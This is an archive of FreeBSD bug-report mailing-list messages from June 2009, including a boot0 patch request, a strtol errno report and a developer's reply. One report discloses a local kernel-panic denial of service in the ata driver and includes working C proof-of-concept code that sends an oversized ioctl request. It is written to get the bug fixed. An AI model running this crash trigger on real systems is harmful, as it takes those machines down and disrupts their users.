[linux] [patch] linux ipcs doesn'work o bin/29516 markm telnet(1) from an non FreeBSD host still uses /etc/tty s kern/29423 [request] [patch] new feature: kernel security hooks i f kern/29421 alc Update a file with mmap will cause mtime/ctime changin o bin/29375 sysinstall(8): disk editor gets confused by slices tha o bin/29363 gad [patch] newsyslog(8) can support time as extension o kern/29355 mux [kernel] [patch] add lchflags support s bin/29292 [patch] addition to burncd(8) for specific handling of a bin/29253 natd(8) forgets about udp connections o bin/29062 markm [libkrb] krb4 and krb5 multiply defined version symbol s i386/28975 [rp] RocketPort problems s kern/28840 gibbs [cam] Possible interrupt masking trouble in sys/cam/ca o bin/28798 mail(1) with a pager (more) requires fg/Ctrl-Z/fg to r o bin/28789 last(1) does not filter for uucp connects o bin/28620 ru xinstall(1) has no way to pass options to strip o bin/28424 remko mtree(8) fails to report directory hierarchy mismatch o bin/28364 [patch] flex(1) generated files fail to compile cleanl o conf/28236 [patch] iso-8859-1_to_cp437.scm doesn't contain some u a bin/28223 remko su(1) doesn't look at login.conf all the time o bin/27972 losing information with talk(1) a conf/27896 Error in /etc/exports invalidates entire line, not jus o kern/27835 standards [libc] execve() doesn't conform to execve(2) spec in s o bin/27829 pax(1) uid/gid cache is read-only o bin/27687 fsck(8) wrapper is not properly passing options to fsc o kern/27660 Kernel does not return error if adding duplicate addre o docs/27605 doc [patch] Cross-document references () o kern/27474 net [ipf] [ppp] Interactive use of user PPP and ipfilter c o kern/27403 [lpt] lpt driver doesn't handle flags anymore o bin/27319 obrien df(1) displays amd pid processes o bin/27306 marcel [patch] hw watchpoints work unreliable under gdb(1) o bin/27281 vidcontrol(1) does not have error codes o bin/27258 getty(8) didn't check if if= isn't empty o kern/27232 [nfs] On NFSv3 mounted filesystems, stat returns st_bl o bin/27216 randi sysinstall(8): can not get to shell prompt from serial o kern/27008 kernel function sysbeep(xxx, 0) does produce sound s bin/26803 des ftp(1) Fix fetch to allow FTP puts in '-o' & allow '@' o kern/26787 [patch] sysctl change request o bin/26695 change request: kill(1)/killall(1) -l output o kern/26618 unmount(2) can't unmount a filesystem whose device has o kern/26562 [lpt] [patch] /dev/lpt0 returns EBUSY when attempting a kern/26534 ipfw [ipfw] Add an option to ipfw to log gid/uid of who cau o bin/26486 remko [libc] [patch] setnetgrent hangs when netgroup contain a gnu/26362 "cvs server" doesn't honour the global --allow-root a kern/26348 [pcvt] scon -s, page fault in HP mode o docs/26286 doc *printf(3) etc should gain format string warnings o kern/26261 [sio] silo overflow problem in sio driver f kern/26142 vwe [nfs] Unlink fails on NFS mounted filesystem o bin/26005 vis(1)/unvis(1) MIME quoted-printable encoding added t a docs/26003 standards getgroups(2) lists NGROUPS_MAX but not syslimits.h f kern/25986 silby Socket would hang at LAST_ACK forever. o kern/25950 obrien [asr] Bad drives on asr look zero-length and panic on o kern/25886 [libc] cgetset(3) doesn't get cleared when switching d o bin/25736 ac(8) -d option probrem with overdays logon o kern/25733 [intpm] mismatch between error reporting in smbus fram s bin/25598 yar patch to let ftpd(8) output message when changing dire o bin/25542 standards sh(1) null char in quoted string s bin/25477 [pam] [patch] pam_radius(8) fix to allow null password o kern/25445 kernel statistics are displayed in wrong types and wra o alpha/25284 alpha PC164 won't reboot with graphics console o bin/25218 mailwrapper(8) invokes sendmail when resources are tig o bin/25015 cp(1) options -i and -f do not work as documented o bin/25013 mv(1) cannot move unresolvable symlinks across devices f kern/24959 kmacy [patch] proper TCP_NOPUSH/TCP_CORK compatibility o docs/24786 doc missing FILES descriptions in sa(4) o bin/24757 yar ftpd(8) not RFC compliant s threa/24632 threads libc_r delicate deviation from libc in handling SIGCHL f kern/24629 harti ng_socket failes to declare connected data sockets as s stand/24590 standards timezone function not compatible witn Single Unix Spec o kern/24528 Bad tracking of Modem status o bin/24513 peter new options for pppd(8) o bin/24485 [patch] to make cron(8) handle clock jumps s threa/24472 threads libc_r does not honor SO_SNDTIMEO/SO_RCVTIMEO socket o o bin/24461 [nis] Being able to increase the YP timeout without re o kern/24435 [libdisk] [patch] changing slice type causes Auto-part o bin/24390 standards ln(1) Replacing old dir-symlinks when using /bin/ln o bin/24066 marcel gdb(1) can't detach from programs linked with libc_r a bin/23912 vi(1) underflow of cnt in vs_paint() by O_NUMBER_LENGT o bin/23562 markm [patch] telnetd(8) doesn't show message in file specif o kern/23546 multimedia [snd_csa] [patch] csa DMA-interrupt problem a bin/23402 sysinstall(8): upgrade ought to check partition sizes a bin/23254 [patch] yacc(1) accepts bad grammer o bin/23098 sysinstall(8): [patch] if installing on a serial conso o conf/23063 net [arp] [patch] for static ARP tables in rc.network s i386/22944 alc [vm] [patch] isa_dmainit fails on machines with 512MB o misc/22914 [bootinst] bootinst messages are not updated s kern/22417 gibbs [adw] [patch] advansys wide scsi driver does not suppo o conf/22308 [nfs] mounting NFS during boot blocks if host map come o kern/22291 [nfs] getcwd(3) fails on recently-modified NFS-mounted o bin/22182 vi(1) options noprint/print/octal broken s bin/22034 [request] nfsstat(1) lacks useful features found in So o kern/21998 kmacy [socket] [patch] ident only for outgoing connections a kern/21807 trhodes [msdosfs] [patch] Make System attribute correspond to o conf/21675 [patch] Better and more disktab entries for MO drives o i386/21672 obrien [i386] AMD Duron Rev. A0 reports incorrect L2 cache si o stand/21519 standards sys/dir.h should be deprecated some more o kern/21463 emulation [linux] Linux compatability mode should not allow setu o bin/21315 Shells often behave oddly when executing shell scripts a bin/21089 [patch] vi(1) silently corrupts open file on SIGINT wh o bin/21008 gad lpr(1) Fix for lpr's handling of lots of jobs in a que o bin/20944 natd(8) enhancements, default config file and manpage o bin/20633 fdisk(8) doesn't handle LBA correctly o kern/20529 [ti] gigabit cards fail to link s bin/20521 rmt(8) /etc/rmt several problems o bin/20501 [patch] dump(8) extra flag to dump to offline autoload o bin/20391 jhb sysinstall(8): sysinstall should check debug.boothowto s kern/20333 des [libpam] ftp login fails on unix password when s/key a o bin/20282 randi sysinstall(8): sysinstall does not recover some /etc f o bin/20172 yacc(1) byacc 1.9 fails to generate $default transitio o bin/20054 yar ftpd(8) rotating _PATH_FTPDSTATFILE losts xferlog s docs/20028 doc ASCII docs should reflect tags in the sourc f kern/19913 silby add SYN+FIN counter o gnu/19882 obrien ld does not detect all undefined symbols! o bin/19837 ambrisko sysinstall(8): [patch] run Fix It floppy from serial p a kern/19782 mkisofs 1.12.1 (i386-unknown-freebsd4.0) doesn't prese s bin/19773 markm [patch] telnet(1) infinite loop depending on how fds a o bin/19772 df(1) output wrong for union-mounts o kern/19756 Inability to use linux extended partition (type 0x85) o bin/19683 mount(8) displays incorrect mount point on failed moun s conf/19573 des Dot Files for Optional Shells s kern/19535 [procfs] [patch] procfs_rlimit tidyup s kern/19402 Signals 127 and 128 cannot be detected in wait4() inte o kern/18909 dwmalone select(2) timeout limited to 100000000 seconds o kern/18874 fs [2TB] 32bit NFS servers export wrong negative values t o gnu/18857 peter Enable GSSAPI in CVS if available s kern/18704 GLOB_ERR not handled correctly by glob() s kern/18558 silby [xl] 3COM 905B realy realy slow when using multiple ad o bin/18498 jhb allowing ELF_VERBOSE in /etc/make.conf o bin/18326 dwmalone no /usr/libdata/lint/llib-lc.ln o bin/18319 dump(8) fails with "cannot reopen disk: interrupted sy o kern/18293 [psm] [patch] lack of versapad mouse wheel emulation o kern/18271 [patch] simplelock: klds not portable across UP and SM o kern/18200 mdodd 3com 3c509b recognized twice during boot s bin/18114 iostat(8): msps from iostat is wrong o bin/18100 [patch] update to src/usr.bin/from/from.c for multiple o conf/17993 obrien improving on the default /etc/amd.map s i386/17662 gibbs [cam] cam_xpt.c incorrectly disables tagged queuing fo o bin/17623 date(1) -v doesn't handle time changes (DST) correctly s conf/17540 [nfs] NIS host lookups cause NFS mounts to wedge at bo o kern/17504 [cam] [patch] Another Micropolis Synchronize Cache Pro o kern/17425 [ppbus] [patch] fix two small printing errors in ppbus p bin/17363 matteo crontab(1) leaves files in /var/cron/tabs when interru o bin/17289 gad [patch] wrong permissions on /var/run/printer s kern/17109 darrenr fastroute crashes for lo0 udp s kern/17108 [nfs] SecureRPC not supported in mount_nfs command o bin/16948 sysinstall(8): sysinstall/disklabel: bad partition tab o kern/16765 bde Add support for mark/space parity o kern/16644 dwmalone [bpf] [patch] Bad comparison expression in bpf_filter. o kern/16195 csjp 16-bit uid/gid struct in sys/ipc.h p misc/15876 edwin [picobsd] PicoBSD message of the day problems o kern/15838 trhodes [msdosfs] [patch] Conversion tables in msdosfs_conv.c o bin/15619 peter [patch] standard pppd(8) doesn't authenticate users wi s kern/15478 incorrect utmp/wtmp records update upon connection bei s kern/15436 [syscons] syscons extension: "propellers" o bin/15205 [patch] Addition to random(6) o bin/15168 [patch] Adding tracklist support to fdformat(1) a kern/15095 silby TCP's advertised window is not scaled immediately upon o bin/15038 sysinstall(8): easy to not notice that selection lists p conf/15010 keramida [patch] rc.firewall: "client" firewall configuration k s bin/14925 standards getsubopt isn't poisonous enough a bin/14682 gad lprm(1) unaware of lp(1) Environment Variables (LPDEST o kern/14646 kern.boottime affected by APM suspend/resume s kern/14562 ioctl() codes should be provided for ejecting all remo o bin/14318 randi sysinstall(8): sysinstall upon install has some counte s kern/13997 rwatson [jail] [patch] RLIMIT_NPROC works unadequately for jai o bin/13882 mount(8) mount -p is missing the quota options s bin/13869 man(1) program saves multiple cached copies of the sam s conf/13775 multi-user boot may hang in NIS environment o bin/13397 vi(1) nvi mishandles tags files under certain conditio f kern/13326 kmacy [headers] [patch] additional timeval interfaces for .root fails to become root s bin/3170 vi(1): vi freaks and dump core if user doesn't exist s kern/2298 [sio] [patch] [request] support for DSR/DCD swapping o s bin/2137 vm statistics are bad s bin/2090 [patch] [nis] clients may bind to FreeBSD ypserv refus a bin/1375 linimon [patch] Extraneous warning from mv(1) 5657 problems total. From owner-freebsd-bugs@FreeBSD.ORG Mon Jun 22 14:30:06 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 5A7BF1065670 for ; Mon, 22 Jun 2009 14:30:06 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 34EC98FC1F for ; Mon, 22 Jun 2009 14:30:06 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5MEU6fO076740 for ; Mon, 22 Jun 2009 14:30:06 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5MEU6OM076737; Mon, 22 Jun 2009 14:30:06 GMT (envelope-from gnats) Resent-Date: Mon, 22 Jun 2009 14:30:06 GMT Resent-Message-Id: <200906221430.n5MEU6OM076737@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Eugene Grosbein Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 6AE251065675; Mon, 22 Jun 2009 14:25:44 +0000 (UTC) (envelope-from eugen@kuzbass.ru) Received: from www.svzserv.kemerovo.su (www.svzserv.kemerovo.su [213.184.65.80]) by mx1.freebsd.org (Postfix) with ESMTP id CAF468FC16; Mon, 22 Jun 2009 14:25:43 +0000 (UTC) (envelope-from eugen@kuzbass.ru) Received: from www.svzserv.kemerovo.su (eugen@localhost [127.0.0.1]) by www.svzserv.kemerovo.su (8.13.8/8.13.8) with ESMTP id n5MDu0x2041533; Mon, 22 Jun 2009 21:56:00 +0800 (KRAST) (envelope-from eugen@www.svzserv.kemerovo.su) Received: (from eugen@localhost) by www.svzserv.kemerovo.su (8.13.8/8.13.8/Submit) id n5MDu0sE041532; Mon, 22 Jun 2009 21:56:00 +0800 (KRAST) (envelope-from eugen) Message-Id: <200906221356.n5MDu0sE041532@www.svzserv.kemerovo.su> Date: Mon, 22 Jun 2009 21:56:00 +0800 (KRAST) From: Eugene Grosbein To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Cc: luigi@FreeBSD.org Subject: bin/135918: [patch] Make BootEasy compatible with NT Drive Serial Number by default X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Eugene Grosbein List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 22 Jun 2009 14:30:06 -0000 >Number: 135918 >Category: bin >Synopsis: [patch] Make BootEasy compatible with NT Drive Serial Number by default >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Jun 22 14:30:05 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Eugene Grosbein >Release: FreeBSD 7-STABLE >Organization: Svyaz-Service JSC >Environment: System: FreeBSD/Windows multiboot system >Description: Release Notes for 7.2 say: "The boot(8) now supports 4-byte volume ID that certain versions of Windows. put into the MBR", http://www.freebsd.org/releases/7.2R/relnotes-detailed.html#BOOT However, this support is not compiled by default and 7.2 still destroys Serial Number that Windows Vista and later needs unconditionally (Windows XP needs it when its boot disk is not C:), so let's enable it. It works perfectly. >How-To-Repeat: Make backup of MBR when your system has Windows Vista or later installed in one of slices then install BootEasy. Your Windows won't boot until MBR contents restored. >Fix: Index: src/sys/boot/i386/boot0/Makefile =================================================================== RCS file: /home/ncvs/src/sys/boot/i386/boot0/Makefile,v retrieving revision 1.32 diff -u -r1.32 Makefile --- src/sys/boot/i386/boot0/Makefile 25 Apr 2005 17:41:35 -0000 1.32 +++ src/sys/boot/i386/boot0/Makefile 22 Jun 2009 13:51:23 -0000 @@ -52,6 +52,7 @@ CFLAGS+=-DFLAGS=${BOOT_BOOT0_FLAGS} \ -DTICKS=${BOOT_BOOT0_TICKS} \ + -DVOLUME_SERIAL \ -DCOMSPEED=${BOOT_BOOT0_COMCONSOLE_SPEED} LDFLAGS=-N -e start -Ttext ${BOOT_BOOT0_ORG} -Wl,-S,--oformat,binary Eugene Grosbein >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Mon Jun 22 16:20:01 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 7C9C6106566C for ; Mon, 22 Jun 2009 16:20:01 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 572988FC1A for ; Mon, 22 Jun 2009 16:20:01 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5MGK1Ux060429 for ; Mon, 22 Jun 2009 16:20:01 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5MGK1Cv060428; Mon, 22 Jun 2009 16:20:01 GMT (envelope-from gnats) Resent-Date: Mon, 22 Jun 2009 16:20:01 GMT Resent-Message-Id: <200906221620.n5MGK1Cv060428@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Shaun Colley Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id B226E1065678 for ; Mon, 22 Jun 2009 16:11:51 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id 85BDA8FC0A for ; Mon, 22 Jun 2009 16:11:51 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n5MGBo6h023779 for ; Mon, 22 Jun 2009 16:11:50 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.14.3/8.14.3/Submit) id n5MGBoo8023778; Mon, 22 Jun 2009 16:11:50 GMT (envelope-from nobody) Message-Id: <200906221611.n5MGBoo8023778@www.freebsd.org> Date: Mon, 22 Jun 2009 16:11:50 GMT From: Shaun Colley To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: kern/135922: fbsd 'ata' driver kernel panic DoS (ioctl) X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 22 Jun 2009 16:20:01 -0000 >Number: 135922 >Category: kern >Synopsis: fbsd 'ata' driver kernel panic DoS (ioctl) >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 22 16:20:01 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Shaun Colley >Release: 6.0-RELEASE, 8-CURRENT >Organization: NGSSoftware Ltd. >Environment: >Description: An specially crafted ioctl request can be made to the ata device driver to cause a kernel panic. ata_device_ioctl() in dev/ata/ata-all.c has the following IOCATAREQUEST option. --- 483 case IOCATAREQUEST: 484 if (!(buf = malloc(ioc_request->count, M_ATA, M_NOWAIT))) { 485 return ENOMEM; 486 } 487 if (!(request = ata_alloc_request())) { 488 free(buf, M_ATA); 489 return ENOMEM; 490 } 491 request->dev = atadev->dev; 492 if (ioc_request->flags & ATA_CMD_WRITE) { 493 error = copyin(ioc_request->data, buf, ioc_request->count); 494 if (error) { 495 free(buf, M_ATA); 496 ata_free_request(request); 497 return error; 498 } 499 } [..........] --- ioc_request->count is under user control, and this is passed to malloc(9). If a very large integer is given in ioc_request->count, kmem_alloc will choke, resulting in a kernel panic. ioc_request->count should be sanitised.. The kernel panic can be reproduced with the code below (in 'how to repeat the problem'). A panic in kmem_alloc will occur. Obviously you need read access to the ata device in /dev to be able to open(2) it, which mitigates the attack somewhat (though could be chained with some other symlink/race condition bug to get the privs needed...). The latest driver code is vulnerable. Give it a try and report back, cheers. >How-To-Repeat: --- #include #include #include #include struct ata_ioc_request { union { struct { u_int8_t command; u_int8_t feature; u_int64_t lba; u_int16_t count; } ata; struct { char ccb[16]; } atapi; } u; caddr_t data; int count; int flags; int timeout; int error; }; #define IOCATAREQUEST _IOWR('a', 100, struct ata_ioc_request) int main() { int fd; struct ata_ioc_request evil; evil.count = 0xffffffff; /* large integer passed to malloc(9) fd = open("/dev/acd0", O_RDONLY); /* one of my ata devices */ ioctl(fd, IOCATAREQUEST, &evil); /* should never reach here if kernel panics */ return 0; } --- (hopefully I didn't mess the code up when I was pasting it) >Fix: I'd write a patch but I'm not running with fbsd right now. ioc_request->count should be sanitised. Is there a reason why ioc_request.count is a signed int? Could make it unsigned and then just do a length check if(ioc_request->count > PAGE_SIZE) return ENOMEM; or something. >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Mon Jun 22 20:20:02 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 1DFCE10656CF for ; Mon, 22 Jun 2009 20:20:02 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id D1E0E8FC1F for ; Mon, 22 Jun 2009 20:20:01 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5MKK11M045611 for ; Mon, 22 Jun 2009 20:20:01 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5MKK1iK045610; Mon, 22 Jun 2009 20:20:01 GMT (envelope-from gnats) Resent-Date: Mon, 22 Jun 2009 20:20:01 GMT Resent-Message-Id: <200906222020.n5MKK1iK045610@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Yuri Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 3BE121065672 for ; Mon, 22 Jun 2009 20:16:51 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id 29E848FC14 for ; Mon, 22 Jun 2009 20:16:51 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n5MKGog9028740 for ; Mon, 22 Jun 2009 20:16:50 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.14.3/8.14.3/Submit) id n5MKGoDj028739; Mon, 22 Jun 2009 20:16:50 GMT (envelope-from nobody) Message-Id: <200906222016.n5MKGoDj028739@www.freebsd.org> Date: Mon, 22 Jun 2009 20:16:50 GMT From: Yuri To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: misc/135932: 'strtol' doesn't reset errno to 0 when converting MAX_INT=2147483647 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 22 Jun 2009 20:20:02 -0000 >Number: 135932 >Category: misc >Synopsis: 'strtol' doesn't reset errno to 0 when converting MAX_INT=2147483647 >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 22 20:20:01 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Yuri >Release: 72-STABLE >Organization: n/a >Environment: >Description: When strtol is supplied string 2147483647 it's impossible to distinguish between overflow and non-overflow situation since return value is the same one that flags overflow (MAX_INT) and strtol doesn't clear errno in this case. strtol should set errno=0 in this case to avoid ambiguity. errno can accidentally be set to 34 (ERANGE) before the call and this will affect the conversion decision in this case. And requiring all programs to reset errno before the call isn't right too since the proposed here simple fix fixes this ambiguity for every program. -- testcase -- #include #include #include #include main() { const char *nptr = "2147483647"; char *endptr; errno=34; // ERANGE int res = ::strtol(nptr, &endptr, 10); printf("res=%i errno=%i\n", res, errno); } --- output --- res=2147483647 errno=34 >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Mon Jun 22 20:51:24 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 5D2C7106564A; Mon, 22 Jun 2009 20:51:24 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 330308FC1F; Mon, 22 Jun 2009 20:51:24 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (remko@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5MKpOFK078762; Mon, 22 Jun 2009 20:51:24 GMT (envelope-from remko@freefall.freebsd.org) Received: (from remko@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5MKpOff078758; Mon, 22 Jun 2009 20:51:24 GMT (envelope-from remko) Date: Mon, 22 Jun 2009 20:51:24 GMT Message-Id: <200906222051.n5MKpOff078758@freefall.freebsd.org> To: remko@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-ports-bugs@FreeBSD.org From: remko@FreeBSD.org Cc: Subject: Re: ports/135916: net-mgmt/nrpe2 rc script stop failing X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 22 Jun 2009 20:51:24 -0000 Old Synopsis: nrpe2 rc script stop failing New Synopsis: net-mgmt/nrpe2 rc script stop failing Responsible-Changed-From-To: freebsd-bugs->freebsd-ports-bugs Responsible-Changed-By: remko Responsible-Changed-When: Mon Jun 22 20:51:00 UTC 2009 Responsible-Changed-Why: reassign to ports team. http://www.freebsd.org/cgi/query-pr.cgi?pr=135916 From owner-freebsd-bugs@FreeBSD.ORG Tue Jun 23 02:02:22 2009 Return-Path: Delivered-To: freebsd-bugs@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 4FDA81065670 for ; Tue, 23 Jun 2009 02:02:22 +0000 (UTC) (envelope-from brde@optusnet.com.au) Received: from mail06.syd.optusnet.com.au (mail06.syd.optusnet.com.au [211.29.132.187]) by mx1.freebsd.org (Postfix) with ESMTP id C65658FC0A for ; Tue, 23 Jun 2009 02:02:21 +0000 (UTC) (envelope-from brde@optusnet.com.au) Received: from c122-107-126-113.carlnfd1.nsw.optusnet.com.au (c122-107-126-113.carlnfd1.nsw.optusnet.com.au [122.107.126.113]) by mail06.syd.optusnet.com.au (8.13.1/8.13.1) with ESMTP id n5N22EtC021897 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Tue, 23 Jun 2009 12:02:18 +1000 Date: Tue, 23 Jun 2009 12:02:12 +1000 (EST) From: Bruce Evans X-X-Sender: bde@delplex.bde.org To: Yuri In-Reply-To: <200906222016.n5MKGoDj028739@www.freebsd.org> Message-ID: <20090623115458.E32048@delplex.bde.org> References: <200906222016.n5MKGoDj028739@www.freebsd.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed Cc: freebsd-bugs@FreeBSD.org, freebsd-gnats-submit@FreeBSD.org Subject: Re: misc/135932: 'strtol' doesn't reset errno to 0 when converting MAX_INT=2147483647 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 23 Jun 2009 02:02:22 -0000 On Mon, 22 Jun 2009, Yuri wrote: >> Description: > When strtol is supplied string 2147483647 it's impossible to distinguish between overflow and non-overflow situation since return value is the same one that flags overflow (MAX_INT) and strtol doesn't clear errno in this case. No, this is easy to distinguish: set errno to 0 (or just to some value different from ERANGE) before calling strtol(), and check errno after calling strtol(). The check can be omitted unless strtol() actually returns INT_MAX. The setting before the call can only be omitted it this error can't happen or if the caller doesn't check for it. Most uses of the strtol() family get this wrong by not even checking :-(. > strtol should set errno=0 in this case to avoid ambiguity. No, strtol() must not set errno to 0. The C standard doesn't permit any library function to set errno to 0. Bruce From owner-freebsd-bugs@FreeBSD.ORG Tue Jun 23 03:20:05 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 345E71065672 for ; Tue, 23 Jun 2009 03:20:05 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 21EE58FC0A for ; Tue, 23 Jun 2009 03:20:05 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5N3K4GQ073805 for ; Tue, 23 Jun 2009 03:20:04 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5N3K4uL073804; Tue, 23 Jun 2009 03:20:04 GMT (envelope-from gnats) Date: Tue, 23 Jun 2009 03:20:04 GMT Message-Id: <200906230320.n5N3K4uL073804@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: Bruce Evans Cc: Subject: Re: misc/135932: 'strtol' doesn't reset errno to 0 when converting MAX_INT=2147483647 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Bruce Evans List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 23 Jun 2009 03:20:05 -0000 The following reply was made to PR misc/135932; it has been noted by GNATS. From: Bruce Evans To: Yuri Cc: freebsd-gnats-submit@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/135932: 'strtol' doesn't reset 